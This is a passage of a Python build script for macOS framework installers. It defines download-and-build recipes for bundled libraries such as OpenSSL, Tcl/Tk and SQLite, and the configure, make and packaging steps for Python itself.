PYTHON_2 = getVersionMajorMinor()[0] == 2
PYTHON_3 = getVersionMajorMinor()[0] == 3
USAGE = textwrap.dedent("""\
Usage: build_python [options]
Options:
-? or -h: Show this message
-b DIR
--build-dir=DIR: Create build here (default: %(WORKDIR)r)
--third-party=DIR: Store third-party sources here (default: %(DEPSRC)r)
--sdk-path=DIR: Location of the SDK (deprecated, use SDKROOT env variable)
--src-dir=DIR: Location of the Python sources (default: %(SRCDIR)r)
--dep-target=10.n macOS deployment target (default: %(DEPTARGET)r)
--universal-archs=x universal architectures (options: %(UNIVERSALOPTS)r, default: %(UNIVERSALARCHS)r)
""")% globals()
# Dict of object file names with shared library names to check after building.
# This is to ensure that we ended up dynamically linking with the shared
# library paths and versions we expected. For example:
# EXPECTED_SHARED_LIBS['_tkinter.so'] = [
# '/Library/Frameworks/Tcl.framework/Versions/8.5/Tcl',
# '/Library/Frameworks/Tk.framework/Versions/8.5/Tk']
EXPECTED_SHARED_LIBS = {}
# Are we building and linking with our own copy of Tcl/TK?
# For now, do so if deployment target is 10.6+.
def internalTk():
return getDeptargetTuple() >= (10, 6)
# List of names of third party software built with this installer.
# The names will be inserted into the rtf version of the License.
THIRD_PARTY_LIBS = []
# Instructions for building libraries that are necessary for building a
# batteries included python.
# [The recipes are defined here for convenience but instantiated later after
# command line options have been processed.]
def library_recipes():
result = []
LT_10_5 = bool(getDeptargetTuple() < (10, 5))
# Since Apple removed the header files for the deprecated system
# OpenSSL as of the Xcode 7 release (for OS X 10.10+), we do not
# have much choice but to build our own copy here, too.
result.extend([
dict(
name="OpenSSL 1.0.2u",
url="https://www.openssl.org/source/old/1.0.2/openssl-1.0.2u.tar.gz",
checksum='cdc2638f789ecc2db2c91488265686c1',
buildrecipe=build_universal_openssl,
configure=None,
install=None,
),
])
if internalTk():
result.extend([
dict(
name="Tcl 8.6.8",
url="ftp://ftp.tcl.tk/pub/tcl//tcl8_6/tcl8.6.8-src.tar.gz",
checksum='81656d3367af032e0ae6157eff134f89',
buildDir="unix",
configure_pre=[
'--enable-shared',
'--enable-threads',
'--libdir=/Library/Frameworks/Python.framework/Versions/%s/lib'%(getVersion(),),
],
useLDFlags=False,
install='make TCL_LIBRARY=%(TCL_LIBRARY)s && make install TCL_LIBRARY=%(TCL_LIBRARY)s DESTDIR=%(DESTDIR)s'%{
"DESTDIR": shellQuote(os.path.join(WORKDIR, 'libraries')),
"TCL_LIBRARY": shellQuote('/Library/Frameworks/Python.framework/Versions/%s/lib/tcl8.6'%(getVersion())),
},
),
dict(
name="Tk 8.6.8",
url="ftp://ftp.tcl.tk/pub/tcl//tcl8_6/tk8.6.8-src.tar.gz",
checksum='5e0faecba458ee1386078fb228d008ba',
patches=[
"tk868_on_10_8_10_9.patch",
],
buildDir="unix",
configure_pre=[
'--enable-aqua',
'--enable-shared',
'--enable-threads',
'--libdir=/Library/Frameworks/Python.framework/Versions/%s/lib'%(getVersion(),),
],
useLDFlags=False,
install='make TCL_LIBRARY=%(TCL_LIBRARY)s TK_LIBRARY=%(TK_LIBRARY)s && make install TCL_LIBRARY=%(TCL_LIBRARY)s TK_LIBRARY=%(TK_LIBRARY)s DESTDIR=%(DESTDIR)s'%{
"DESTDIR": shellQuote(os.path.join(WORKDIR, 'libraries')),
"TCL_LIBRARY": shellQuote('/Library/Frameworks/Python.framework/Versions/%s/lib/tcl8.6'%(getVersion())),
"TK_LIBRARY": shellQuote('/Library/Frameworks/Python.framework/Versions/%s/lib/tk8.6'%(getVersion())),
},
),
])
if PYTHON_3:
result.extend([
dict(
name="XZ 5.2.3",
url="http://tukaani.org/xz/xz-5.2.3.tar.gz",
checksum='ef68674fb47a8b8e741b34e429d86e9d',
configure_pre=[
'--disable-dependency-tracking',
]
),
])
result.extend([
dict(
name="NCurses 5.9",
url="http://ftp.gnu.org/pub/gnu/ncurses/ncurses-5.9.tar.gz",
checksum='8cb9c412e5f2d96bc6f459aa8c6282a1',
configure_pre=[
"--enable-widec",
"--without-cxx",
"--without-cxx-binding",
"--without-ada",
"--without-curses-h",
"--enable-shared",
"--with-shared",
"--without-debug",
"--without-normal",
"--without-tests",
"--without-manpages",
"--datadir=/usr/share",
"--sysconfdir=/etc",
"--sharedstatedir=/usr/com",
"--with-terminfo-dirs=/usr/share/terminfo",
"--with-default-terminfo-dir=/usr/share/terminfo",
"--libdir=/Library/Frameworks/Python.framework/Versions/%s/lib"%(getVersion(),),
],
patchscripts=[
("ftp://invisible-island.net/ncurses//5.9/ncurses-5.9-20120616-patch.sh.bz2",
"f54bf02a349f96a7c4f0d00922f3a0d4"),
],
useLDFlags=False,
install='make && make install DESTDIR=%s && cd %s/usr/local/lib && ln -fs ../../../Library/Frameworks/Python.framework/Versions/%s/lib/lib* .'%(
shellQuote(os.path.join(WORKDIR, 'libraries')),
shellQuote(os.path.join(WORKDIR, 'libraries')),
getVersion(),
),
),
dict(
name="SQLite 3.31.1",
url="https://sqlite.org/2020/sqlite-autoconf-3310100.tar.gz",
checksum='2d0a553534c521504e3ac3ad3b90f125',
extra_cflags=('-Os '
'-DSQLITE_ENABLE_FTS5 '
'-DSQLITE_ENABLE_FTS4 '
'-DSQLITE_ENABLE_FTS3_PARENTHESIS '
'-DSQLITE_ENABLE_JSON1 '
'-DSQLITE_ENABLE_RTREE '
'-DSQLITE_TCL=0 '
'%s' % ('','-DSQLITE_WITHOUT_ZONEMALLOC ')[LT_10_5]),
configure_pre=[
'--enable-threadsafe',
'--enable-shared=no',
'--enable-static=yes',
'--disable-readline',
'--disable-dependency-tracking',
]
),
])
if getDeptargetTuple() < (10, 5):
result.extend([
dict(
name="Bzip2 1.0.6",
url="http://bzip.org/1.0.6/bzip2-1.0.6.tar.gz",
checksum='00b516f4704d4a7cb50a1d97e6e8e15b',
configure=None,
install='make install CC=%s CXX=%s, PREFIX=%s/usr/local/ CFLAGS="-arch %s"'%(
CC, CXX,
shellQuote(os.path.join(WORKDIR, 'libraries')),
' -arch '.join(ARCHLIST),
),
),
dict(
name="ZLib 1.2.3",
url="http://www.gzip.org/zlib/zlib-1.2.3.tar.gz",
checksum='debc62758716a169df9f62e6ab2bc634',
configure=None,
install='make install CC=%s CXX=%s, prefix=%s/usr/local/ CFLAGS="-arch %s"'%(
CC, CXX,
shellQuote(os.path.join(WORKDIR, 'libraries')),
' -arch '.join(ARCHLIST),
),
),
dict(
# Note that GNU readline is GPL'd software
name="GNU Readline 6.1.2",
url="http://ftp.gnu.org/pub/gnu/readline/readline-6.1.tar.gz" ,
checksum='fc2f7e714fe792db1ce6ddc4c9fb4ef3',
patchlevel='0',
patches=[
# The readline maintainers don't do actual micro releases, but
# just ship a set of patches.
('http://ftp.gnu.org/pub/gnu/readline/readline-6.1-patches/readline61-001',
'c642f2e84d820884b0bf9fd176bc6c3f'),
('http://ftp.gnu.org/pub/gnu/readline/readline-6.1-patches/readline61-002',
'1a76781a1ea734e831588285db7ec9b1'),
]
),
])
if not PYTHON_3:
result.extend([
dict(
name="Sleepycat DB 4.7.25",
url="http://download.oracle.com/berkeley-db/db-4.7.25.tar.gz",
checksum='ec2b87e833779681a0c3a814aa71359e',
buildDir="build_unix",
configure="../dist/configure",
configure_pre=[
'--includedir=/usr/local/include/db4',
]
),
])
return result
# Instructions for building packages inside the .mpkg.
def pkg_recipes():
unselected_for_python3 = ('selected', 'unselected')[PYTHON_3]
result = [
dict(
name="PythonFramework",
long_name="Python Framework",
source="/Library/Frameworks/Python.framework",
readme="""\
This package installs Python.framework, that is the python
interpreter and the standard library.
""",
postflight="scripts/postflight.framework",
selected='selected',
),
dict(
name="PythonApplications",
long_name="GUI Applications",
source="/Applications/Python %(VER)s",
readme="""\
This package installs IDLE (an interactive Python IDE),
Python Launcher and Build Applet (create application bundles
from python scripts).
It also installs a number of examples and demos.
""",
required=False,
selected='selected',
),
dict(
name="PythonUnixTools",
long_name="UNIX command-line tools",
source="/usr/local/bin",
readme="""\
This package installs the unix tools in /usr/local/bin for
compatibility with older releases of Python. This package
is not necessary to use Python.
""",
required=False,
selected='selected',
),
dict(
name="PythonDocumentation",
long_name="Python Documentation",
topdir="/Library/Frameworks/Python.framework/Versions/%(VER)s/Resources/English.lproj/Documentation",
source="/pydocs",
readme="""\
This package installs the python documentation at a location
that is useable for pydoc and IDLE.
""",
postflight="scripts/postflight.documentation",
required=False,
selected='selected',
),
dict(
name="PythonProfileChanges",
long_name="Shell profile updater",
readme="""\
This packages updates your shell profile to make sure that
the Python tools are found by your shell in preference of
the system provided Python tools.
If you don't install this package you'll have to add
"/Library/Frameworks/Python.framework/Versions/%(VER)s/bin"
to your PATH by hand.
""",
postflight="scripts/postflight.patch-profile",
topdir="/Library/Frameworks/Python.framework",
source="/empty-dir",
required=False,
selected='selected',
),
dict(
name="PythonInstallPip",
long_name="Install or upgrade pip",
readme="""\
This package installs (or upgrades from an earlier version)
pip, a tool for installing and managing Python packages.
""",
postflight="scripts/postflight.ensurepip",
topdir="/Library/Frameworks/Python.framework",
source="/empty-dir",
required=False,
selected='selected',
),
]
return result
def fatal(msg):
"""
A fatal error, bail out.
"""
sys.stderr.write('FATAL: ')
sys.stderr.write(msg)
sys.stderr.write('\n')
sys.exit(1)
def fileContents(fn):
"""
Return the contents of the named file
"""
return open(fn, 'r').read()
def runCommand(commandline):
"""
Run a command and raise RuntimeError if it fails. Output is suppressed
unless the command fails.
"""
fd = os.popen(commandline, 'r')
data = fd.read()
xit = fd.close()
if xit is not None:
sys.stdout.write(data)
raise RuntimeError("command failed: %s"%(commandline,))
if VERBOSE:
sys.stdout.write(data); sys.stdout.flush()
def captureCommand(commandline):
fd = os.popen(commandline, 'r')
data = fd.read()
xit = fd.close()
if xit is not None:
sys.stdout.write(data)
raise RuntimeError("command failed: %s"%(commandline,))
return data
def getTclTkVersion(configfile, versionline):
"""
search Tcl or Tk configuration file for version line
"""
try:
f = open(configfile, "r")
except OSError:
fatal("Framework configuration file not found: %s" % configfile)
for l in f:
if l.startswith(versionline):
f.close()
return l
fatal("Version variable %s not found in framework configuration file: %s"
% (versionline, configfile))
def checkEnvironment():
"""
Check that we're running on a supported system.
"""
if sys.version_info[0:2] < (2, 5):
fatal("This script must be run with Python 2.5 (or later)")
if platform.system() != 'Darwin':
fatal("This script should be run on a macOS 10.5 (or later) system")
if int(platform.release().split('.')[0]) < 8:
fatal("This script should be run on a macOS 10.5 (or later) system")
# Because we only support dynamic load of only one major/minor version of
# Tcl/Tk, if we are not using building and using our own private copy of
# Tcl/Tk, ensure:
# 1. there is a user-installed framework (usually ActiveTcl) in (or linked
# in) SDKROOT/Library/Frameworks. As of Python 3.6.5, we no longer
# enforce that the version of the user-installed framework also
# exists in the system-supplied Tcl/Tk frameworks. Time to support
# Tcl/Tk 8.6 even if Apple does not.
if not internalTk():
frameworks = {}
for framework in ['Tcl', 'Tk']:
fwpth = 'Library/Frameworks/%s.framework/Versions/Current' % framework
libfw = os.path.join('/', fwpth)
usrfw = os.path.join(os.getenv('HOME'), fwpth)
frameworks[framework] = os.readlink(libfw)
if not os.path.exists(libfw):
fatal("Please install a link to a current %s %s as %s so "
"the user can override the system framework."
% (framework, frameworks[framework], libfw))
if os.path.exists(usrfw):
fatal("Please rename %s to avoid possible dynamic load issues."
% usrfw)
if frameworks['Tcl'] != frameworks['Tk']:
fatal("The Tcl and Tk frameworks are not the same version.")
print(" -- Building with external Tcl/Tk %s frameworks"
% frameworks['Tk'])
# add files to check after build
EXPECTED_SHARED_LIBS['_tkinter.so'] = [
"/Library/Frameworks/Tcl.framework/Versions/%s/Tcl"
% frameworks['Tcl'],
"/Library/Frameworks/Tk.framework/Versions/%s/Tk"
% frameworks['Tk'],
]
else:
print(" -- Building private copy of Tcl/Tk")
print("")
# Remove inherited environment variables which might influence build
environ_var_prefixes = ['CPATH', 'C_INCLUDE_', 'DYLD_', 'LANG', 'LC_',
'LD_', 'LIBRARY_', 'PATH', 'PYTHON']
for ev in list(os.environ):
for prefix in environ_var_prefixes:
if ev.startswith(prefix) :
print("INFO: deleting environment variable %s=%s" % (
ev, os.environ[ev]))
del os.environ[ev]
base_path = '/bin:/sbin:/usr/bin:/usr/sbin'
if 'SDK_TOOLS_BIN' in os.environ:
base_path = os.environ['SDK_TOOLS_BIN'] + ':' + base_path
# Xcode 2.5 on OS X 10.4 does not include SetFile in its usr/bin;
# add its fixed location here if it exists
OLD_DEVELOPER_TOOLS = '/Developer/Tools'
if os.path.isdir(OLD_DEVELOPER_TOOLS):
base_path = base_path + ':' + OLD_DEVELOPER_TOOLS
os.environ['PATH'] = base_path
print("Setting default PATH: %s"%(os.environ['PATH']))
if PYTHON_2:
# Ensure we have access to sphinx-build.
# You may have to define SDK_TOOLS_BIN and link to it there,
runCommand('sphinx-build --version')
def parseOptions(args=None):
"""
Parse arguments and update global settings.
"""
global WORKDIR, DEPSRC, SRCDIR, DEPTARGET
global UNIVERSALOPTS, UNIVERSALARCHS, ARCHLIST, CC, CXX
global FW_VERSION_PREFIX
global FW_SSL_DIRECTORY
if args is None:
args = sys.argv[1:]
try:
options, args = getopt.getopt(args, '?hb',
[ 'build-dir=', 'third-party=', 'sdk-path=' , 'src-dir=',
'dep-target=', 'universal-archs=', 'help' ])
except getopt.GetoptError:
print(sys.exc_info()[1])
sys.exit(1)
if args:
print("Additional arguments")
sys.exit(1)
deptarget = None
for k, v in options:
if k in ('-h', '-?', '--help'):
print(USAGE)
sys.exit(0)
elif k in ('-d', '--build-dir'):
WORKDIR=v
elif k in ('--third-party',):
DEPSRC=v
elif k in ('--sdk-path',):
print(" WARNING: --sdk-path is no longer supported")
elif k in ('--src-dir',):
SRCDIR=v
elif k in ('--dep-target', ):
DEPTARGET=v
deptarget=v
elif k in ('--universal-archs', ):
if v in UNIVERSALOPTS:
UNIVERSALARCHS = v
ARCHLIST = universal_opts_map[UNIVERSALARCHS]
if deptarget is None:
# Select alternate default deployment
# target
DEPTARGET = default_target_map.get(v, '10.5')
else:
raise NotImplementedError(v)
else:
raise NotImplementedError(k)
SRCDIR=os.path.abspath(SRCDIR)
WORKDIR=os.path.abspath(WORKDIR)
DEPSRC=os.path.abspath(DEPSRC)
CC, CXX = getTargetCompilers()
FW_VERSION_PREFIX = FW_PREFIX[:] + ["Versions", getVersion()]
FW_SSL_DIRECTORY = FW_VERSION_PREFIX[:] + ["etc", "openssl"]
print("-- Settings:")
print(" * Source directory: %s" % SRCDIR)
print(" * Build directory: %s" % WORKDIR)
print(" * Third-party source: %s" % DEPSRC)
print(" * Deployment target: %s" % DEPTARGET)
print(" * Universal archs: %s" % str(ARCHLIST))
print(" * C compiler: %s" % CC)
print(" * C++ compiler: %s" % CXX)
print("")
print(" -- Building a Python %s framework at patch level %s"
% (getVersion(), getFullVersion()))
print("")
def extractArchive(builddir, archiveName):
"""
Extract a source archive into 'builddir'. Returns the path of the
extracted archive.
XXX: This function assumes that archives contain a toplevel directory
that is has the same name as the basename of the archive. This is
safe enough for almost anything we use. Unfortunately, it does not
work for current Tcl and Tk source releases where the basename of
the archive ends with "-src" but the uncompressed directory does not.
For now, just special case Tcl and Tk tar.gz downloads.
"""
curdir = os.getcwd()
try:
os.chdir(builddir)
if archiveName.endswith('.tar.gz'):
retval = os.path.basename(archiveName[:-7])
if ((retval.startswith('tcl') or retval.startswith('tk'))
and retval.endswith('-src')):
retval = retval[:-4]
if os.path.exists(retval):
shutil.rmtree(retval)
fp = os.popen("tar zxf %s 2>&1"%(shellQuote(archiveName),), 'r')
elif archiveName.endswith('.tar.bz2'):
retval = os.path.basename(archiveName[:-8])
if os.path.exists(retval):
shutil.rmtree(retval)
fp = os.popen("tar jxf %s 2>&1"%(shellQuote(archiveName),), 'r')
elif archiveName.endswith('.tar'):
retval = os.path.basename(archiveName[:-4])
if os.path.exists(retval):
shutil.rmtree(retval)
fp = os.popen("tar xf %s 2>&1"%(shellQuote(archiveName),), 'r')
elif archiveName.endswith('.zip'):
retval = os.path.basename(archiveName[:-4])
if os.path.exists(retval):
shutil.rmtree(retval)
fp = os.popen("unzip %s 2>&1"%(shellQuote(archiveName),), 'r')
data = fp.read()
xit = fp.close()
if xit is not None:
sys.stdout.write(data)
raise RuntimeError("Cannot extract %s"%(archiveName,))
return os.path.join(builddir, retval)
finally:
os.chdir(curdir)
def downloadURL(url, fname):
"""
Download the contents of the url into the file.
"""
fpIn = urllib_request.urlopen(url)
fpOut = open(fname, 'wb')
block = fpIn.read(10240)
try:
while block:
fpOut.write(block)
block = fpIn.read(10240)
fpIn.close()
fpOut.close()
except:
try:
os.unlink(fname)
except OSError:
pass
def verifyThirdPartyFile(url, checksum, fname):
"""
Download file from url to filename fname if it does not already exist.
Abort if file contents does not match supplied md5 checksum.
"""
name = os.path.basename(fname)
if os.path.exists(fname):
print("Using local copy of %s"%(name,))
else:
print("Did not find local copy of %s"%(name,))
print("Downloading %s"%(name,))
downloadURL(url, fname)
print("Archive for %s stored as %s"%(name, fname))
if os.system(
'MD5=$(openssl md5 %s) ; test "${MD5##*= }" = "%s"'
% (shellQuote(fname), checksum) ):
fatal('MD5 checksum mismatch for file %s' % fname)
def build_universal_openssl(basedir, archList):
"""
Special case build recipe for universal build of openssl.
The upstream OpenSSL build system does not directly support
OS X universal builds. We need to build each architecture
separately then lipo them together into fat libraries.
"""
# OpenSSL fails to build with Xcode 2.5 (on OS X 10.4).
# If we are building on a 10.4.x or earlier system,
# unilaterally disable assembly code building to avoid the problem.
no_asm = int(platform.release().split(".")[0]) < 9
def build_openssl_arch(archbase, arch):
"Build one architecture of openssl"
arch_opts = {
"i386": ["darwin-i386-cc"],
"x86_64": ["darwin64-x86_64-cc", "enable-ec_nistp_64_gcc_128"],
"ppc": ["darwin-ppc-cc"],
"ppc64": ["darwin64-ppc-cc"],
}
configure_opts = [
"no-krb5",
"no-idea",
"no-mdc2",
"no-rc5",
"no-zlib",
"enable-tlsext",
"no-ssl2",
"no-ssl3",
# "enable-unit-test",
"shared",
"--install_prefix=%s"%shellQuote(archbase),
"--prefix=%s"%os.path.join("/", *FW_VERSION_PREFIX),
"--openssldir=%s"%os.path.join("/", *FW_SSL_DIRECTORY),
]
if no_asm:
configure_opts.append("no-asm")
# OpenSSL 1.0.2o broke the Configure test for whether the compiler
# in use supports dependency rule generation (cc -M) with gcc-4.2
# used for the 10.6+ installer builds. Patch Configure here to
# force use of "cc -M" rather than "makedepend".
runCommand(
"""sed -i "" 's|my $cc_as_makedepend = 0|my $cc_as_makedepend = 1|g' Configure""")
runCommand(" ".join(["perl", "Configure"]
+ arch_opts[arch] + configure_opts))
runCommand("make depend")
runCommand("make all")
runCommand("make install_sw")
# runCommand("make test")
return
srcdir = os.getcwd()
universalbase = os.path.join(srcdir, "..",
os.path.basename(srcdir) + "-universal")
os.mkdir(universalbase)
archbasefws = []
for arch in archList:
# fresh copy of the source tree
archsrc = os.path.join(universalbase, arch, "src")
shutil.copytree(srcdir, archsrc, symlinks=True)
# install base for this arch
archbase = os.path.join(universalbase, arch, "root")
os.mkdir(archbase)
# Python framework base within install_prefix:
# the build will install into this framework..
# This is to ensure that the resulting shared libs have
# the desired real install paths built into them.
archbasefw = os.path.join(archbase, *FW_VERSION_PREFIX)
# build one architecture
os.chdir(archsrc)
build_openssl_arch(archbase, arch)
os.chdir(srcdir)
archbasefws.append(archbasefw)
# copy arch-independent files from last build into the basedir framework
basefw = os.path.join(basedir, *FW_VERSION_PREFIX)
shutil.copytree(
os.path.join(archbasefw, "include", "openssl"),
os.path.join(basefw, "include", "openssl")
)
shlib_version_number = grepValue(os.path.join(archsrc, "Makefile"),
"SHLIB_VERSION_NUMBER")
# e.g. -> "1.0.0"
libcrypto = "libcrypto.dylib"
libcrypto_versioned = libcrypto.replace(".", "."+shlib_version_number+".")
# e.g. -> "libcrypto.1.0.0.dylib"
libssl = "libssl.dylib"
libssl_versioned = libssl.replace(".", "."+shlib_version_number+".")
# e.g. -> "libssl.1.0.0.dylib"
try:
os.mkdir(os.path.join(basefw, "lib"))
except OSError:
pass
# merge the individual arch-dependent shared libs into a fat shared lib
archbasefws.insert(0, basefw)
for (lib_unversioned, lib_versioned) in [
(libcrypto, libcrypto_versioned),
(libssl, libssl_versioned)
]:
runCommand("lipo -create -output " +
" ".join(shellQuote(
os.path.join(fw, "lib", lib_versioned))
for fw in archbasefws))
# and create an unversioned symlink of it
os.symlink(lib_versioned, os.path.join(basefw, "lib", lib_unversioned))
# Create links in the temp include and lib dirs that will be injected
# into the Python build so that setup.py can find them while building
# and the versioned links so that the setup.py post-build import test
# does not fail.
relative_path = os.path.join("..", "..", "..", *FW_VERSION_PREFIX)
for fn in [
["include", "openssl"],
["lib", libcrypto],
["lib", libssl],
["lib", libcrypto_versioned],
["lib", libssl_versioned],
]:
os.symlink(
os.path.join(relative_path, *fn),
os.path.join(basedir, "usr", "local", *fn)
)
return
def buildRecipe(recipe, basedir, archList):
"""
Build software using a recipe. This function does the
'configure;make;make install' dance for C software, with a possibility
to customize this process, basically a poor-mans DarwinPorts.
"""
curdir = os.getcwd()
name = recipe['name']
THIRD_PARTY_LIBS.append(name)
url = recipe['url']
configure = recipe.get('configure', './configure')
buildrecipe = recipe.get('buildrecipe', None)
install = recipe.get('install', 'make && make install DESTDIR=%s'%(
shellQuote(basedir)))
archiveName = os.path.split(url)[-1]
sourceArchive = os.path.join(DEPSRC, archiveName)
if not os.path.exists(DEPSRC):
os.mkdir(DEPSRC)
verifyThirdPartyFile(url, recipe['checksum'], sourceArchive)
print("Extracting archive for %s"%(name,))
buildDir=os.path.join(WORKDIR, '_bld')
if not os.path.exists(buildDir):
os.mkdir(buildDir)
workDir = extractArchive(buildDir, sourceArchive)
os.chdir(workDir)
for patch in recipe.get('patches', ()):
if isinstance(patch, tuple):
url, checksum = patch
fn = os.path.join(DEPSRC, os.path.basename(url))
verifyThirdPartyFile(url, checksum, fn)
else:
# patch is a file in the source directory
fn = os.path.join(curdir, patch)
runCommand('patch -p%s < %s'%(recipe.get('patchlevel', 1),
shellQuote(fn),))
for patchscript in recipe.get('patchscripts', ()):
if isinstance(patchscript, tuple):
url, checksum = patchscript
fn = os.path.join(DEPSRC, os.path.basename(url))
verifyThirdPartyFile(url, checksum, fn)
else:
# patch is a file in the source directory
fn = os.path.join(curdir, patchscript)
if fn.endswith('.bz2'):
runCommand('bunzip2 -fk %s' % shellQuote(fn))
fn = fn[:-4]
runCommand('sh %s' % shellQuote(fn))
os.unlink(fn)
if 'buildDir' in recipe:
os.chdir(recipe['buildDir'])
if configure is not None:
configure_args = [
"--prefix=/usr/local",
"--enable-static",
"--disable-shared",
#"CPP=gcc -arch %s -E"%(' -arch '.join(archList,),),
]
if 'configure_pre' in recipe:
args = list(recipe['configure_pre'])
if '--disable-static' in args:
configure_args.remove('--enable-static')
if '--enable-shared' in args:
configure_args.remove('--disable-shared')
configure_args.extend(args)
if recipe.get('useLDFlags', 1):
configure_args.extend([
"CFLAGS=%s-mmacosx-version-min=%s -arch %s "
"-I%s/usr/local/include"%(
recipe.get('extra_cflags', ''),
DEPTARGET,
' -arch '.join(archList),
shellQuote(basedir)[1:-1],),
"LDFLAGS=-mmacosx-version-min=%s -L%s/usr/local/lib -arch %s"%(
DEPTARGET,
shellQuote(basedir)[1:-1],
' -arch '.join(archList)),
])
else:
configure_args.extend([
"CFLAGS=%s-mmacosx-version-min=%s -arch %s "
"-I%s/usr/local/include"%(
recipe.get('extra_cflags', ''),
DEPTARGET,
' -arch '.join(archList),
shellQuote(basedir)[1:-1],),
])
if 'configure_post' in recipe:
configure_args = configure_args + list(recipe['configure_post'])
configure_args.insert(0, configure)
configure_args = [ shellQuote(a) for a in configure_args ]
print("Running configure for %s"%(name,))
runCommand(' '.join(configure_args) + ' 2>&1')
if buildrecipe is not None:
# call special-case build recipe, e.g. for openssl
buildrecipe(basedir, archList)
if install is not None:
print("Running install for %s"%(name,))
runCommand('{ ' + install + ' ;} 2>&1')
print("Done %s"%(name,))
print("")
os.chdir(curdir)
def buildLibraries():
"""
Build our dependencies into $WORKDIR/libraries/usr/local
"""
print("")
print("Building required libraries")
print("")
universal = os.path.join(WORKDIR, 'libraries')
os.mkdir(universal)
os.makedirs(os.path.join(universal, 'usr', 'local', 'lib'))
os.makedirs(os.path.join(universal, 'usr', 'local', 'include'))
for recipe in library_recipes():
buildRecipe(recipe, universal, ARCHLIST)
def buildPythonDocs():
# This stores the documentation as Resources/English.lproj/Documentation
# inside the framework. pydoc and IDLE will pick it up there.
print("Install python documentation")
rootDir = os.path.join(WORKDIR, '_root')
buildDir = os.path.join('../../Doc')
docdir = os.path.join(rootDir, 'pydocs')
curDir = os.getcwd()
os.chdir(buildDir)
runCommand('make clean')
if PYTHON_2:
# Python 2 doc builds do not use blurb nor do they have a venv target.
# Assume sphinx-build is on our PATH, checked in checkEnvironment
runCommand('make html')
else:
# Create virtual environment for docs builds with blurb and sphinx
runCommand('make venv')
runCommand('make html PYTHON=venv/bin/python')
os.chdir(curDir)
if not os.path.exists(docdir):
os.mkdir(docdir)
os.rename(os.path.join(buildDir, 'build', 'html'), docdir)
def buildPython():
print("Building a universal python for %s architectures" % UNIVERSALARCHS)
buildDir = os.path.join(WORKDIR, '_bld', 'python')
rootDir = os.path.join(WORKDIR, '_root')
if os.path.exists(buildDir):
shutil.rmtree(buildDir)
if os.path.exists(rootDir):
shutil.rmtree(rootDir)
os.makedirs(buildDir)
os.makedirs(rootDir)
os.makedirs(os.path.join(rootDir, 'empty-dir'))
curdir = os.getcwd()
os.chdir(buildDir)
# Extract the version from the configure file, needed to calculate
# several paths.
version = getVersion()
# Since the extra libs are not in their installed framework location
# during the build, augment the library path so that the interpreter
# will find them during its extension import sanity checks.
os.environ['DYLD_LIBRARY_PATH'] = os.path.join(WORKDIR,
'libraries', 'usr', 'local', 'lib')
print("Running configure...")
runCommand("%s -C --enable-framework --enable-universalsdk=/ "
"--with-universal-archs=%s "
"%s "
"%s "
"%s "
"%s "
"LDFLAGS='-g -L%s/libraries/usr/local/lib' "
"CFLAGS='-g -I%s/libraries/usr/local/include' 2>&1"%(
shellQuote(os.path.join(SRCDIR, 'configure')),
UNIVERSALARCHS,
(' ', '--with-computed-gotos ')[PYTHON_3],
(' ', '--without-ensurepip ')[PYTHON_3],
(' ', "--with-tcltk-includes='-I%s/libraries/usr/local/include'"%(
shellQuote(WORKDIR)[1:-1],))[internalTk()],
(' ', "--with-tcltk-libs='-L%s/libraries/usr/local/lib -ltcl8.6 -ltk8.6'"%(
shellQuote(WORKDIR)[1:-1],))[internalTk()],
shellQuote(WORKDIR)[1:-1],
shellQuote(WORKDIR)[1:-1]))
# Look for environment value BUILDINSTALLER_BUILDPYTHON_MAKE_EXTRAS
# and, if defined, append its value to the make command. This allows
# us to pass in version control tags, like GITTAG, to a build from a
# tarball rather than from a vcs checkout, thus eliminating the need
# to have a working copy of the vcs program on the build machine.
#
# A typical use might be:
# export BUILDINSTALLER_BUILDPYTHON_MAKE_EXTRAS=" \
# GITVERSION='echo 123456789a' \
# GITTAG='echo v3.6.0' \
# GITBRANCH='echo 3.6'"
make_extras = os.getenv("BUILDINSTALLER_BUILDPYTHON_MAKE_EXTRAS")
if make_extras:
make_cmd = "make " + make_extras
else:
make_cmd = "make"
print("Running " + make_cmd)
runCommand(make_cmd)
print("Running make install")
runCommand("make install DESTDIR=%s"%(
shellQuote(rootDir)))
print("Running make frameworkinstallextras")
runCommand("make frameworkinstallextras DESTDIR=%s"%(
shellQuote(rootDir)))
del os.environ['DYLD_LIBRARY_PATH']
print("Copying required shared libraries")
if os.path.exists(os.path.join(WORKDIR, 'libraries', 'Library')):
build_lib_dir = os.path.join(
WORKDIR, 'libraries', 'Library', 'Frameworks',
'Python.framework', 'Versions', getVersion(), 'lib')
fw_lib_dir = os.path.join(
WORKDIR, '_root', 'Library', 'Frameworks',
'Python.framework', 'Versions', getVersion(), 'lib')
if internalTk():
# move Tcl and Tk pkgconfig files
runCommand("mv %s/pkgconfig/* %s/pkgconfig"%(
shellQuote(build_lib_dir),
shellQuote(fw_lib_dir) ))
runCommand("rm -r %s/pkgconfig"%(
shellQuote(build_lib_dir), ))
runCommand("mv %s/* %s"%(
shellQuote(build_lib_dir),
shellQuote(fw_lib_dir) ))
frmDir = os.path.join(rootDir, 'Library', 'Frameworks', 'Python.framework')
frmDirVersioned = os.path.join(frmDir, 'Versions', version)
path_to_lib = os.path.join(frmDirVersioned, 'lib', 'python%s'%(version,))
# create directory for OpenSSL certificates
sslDir = os.path.join(frmDirVersioned, 'etc', 'openssl')
os.makedirs(sslDir)
print("Fix file modes")
gid = grp.getgrnam('admin').gr_gid
shared_lib_error = False
for dirpath, dirnames, filenames in os.walk(frmDir):
for dn in dirnames:
os.chmod(os.path.join(dirpath, dn), STAT_0o775)
os.chown(os.path.join(dirpath, dn), -1, gid)
for fn in filenames:
if os.path.islink(fn):
continue
# "chmod g+w $fn"
p = os.path.join(dirpath, fn)
st = os.stat(p)
os.chmod(p, stat.S_IMODE(st.st_mode) | stat.S_IWGRP)
os.chown(p, -1, gid)
if fn in EXPECTED_SHARED_LIBS:
# check to see that this file was linked with the
# expected library path and version
data = captureCommand("otool -L %s" % shellQuote(p))
for sl in EXPECTED_SHARED_LIBS[fn]:
if ("\t%s " % sl) not in data:
print("Expected shared lib %s was not linked with %s"
% (sl, p))
shared_lib_error = True
if shared_lib_error:
fatal("Unexpected shared library errors.")
if PYTHON_3:
LDVERSION=None
VERSION=None
ABIFLAGS=None
fp = open(os.path.join(buildDir, 'Makefile'), 'r')
for ln in fp:
if ln.startswith('VERSION='):
VERSION=ln.split()[1]
if ln.startswith('ABIFLAGS='):
ABIFLAGS=ln.split()[1]
if ln.startswith('LDVERSION='):
